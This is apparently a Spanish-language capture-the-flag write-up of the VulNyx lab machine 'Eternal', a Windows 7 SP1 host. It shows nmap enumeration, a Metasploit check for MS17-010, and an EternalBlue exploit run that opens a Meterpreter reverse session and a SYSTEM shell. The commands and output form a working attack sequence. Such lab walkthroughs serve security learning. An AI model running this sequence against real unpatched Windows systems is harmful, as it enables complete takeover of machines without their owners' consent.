cd ~/blog

~/writeups/vulnyx/24-eternal.md

24 - Eternal

low Windows vulnyx 30-10-2024
MS17-010 EternalBlue (CVE-2017-0143)
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.85.196
 nmap -sCV -p 135,139,445,5357,49152,49153,49154,49155,49156,49157 -Pn -oN 02-targeted.txt 192.168.85.196
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-30 15:41 -03
Nmap scan report for 192.168.85.196
Host is up (0.00036s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: MIKE-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: MIKE-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:d8:fe:bf (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2024-10-30T14:42:55
|_  start_date: 2024-10-30T14:38:53
| smb-os-discovery:
|   OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: MIKE-PC
|   NetBIOS computer name: MIKE-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-10-30T15:42:55+01:00
|_clock-skew: mean: -4h20m01s, deviation: 34m37s, median: -4h00m02s
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.37 seconds

Se trata de un Windows 7 SP1 con SMB expuesto, candidato directo a EternalBlue. Lo confirmamos con el módulo auxiliar de Metasploit:

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.85.196
rhosts => 192.168.85.196
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.85.196:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.85.196:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Lanzamos el exploit de EternalBlue, que nos otorga una sesión Meterpreter como NT AUTHORITY\SYSTEM:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.85.196
rhosts => 192.168.85.196
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
...
[*] Meterpreter session 1 opened (192.168.85.50:4444 -> 192.168.85.196:49158) at 2024-10-30 15:46:47 -0300

meterpreter > shell
Process 1356 created.
Channel 1 created.
Microsoft Windows [Versi�n 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Windows\system32>whoami
whoami
nt authority\system

Obtenemos ambas flags y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados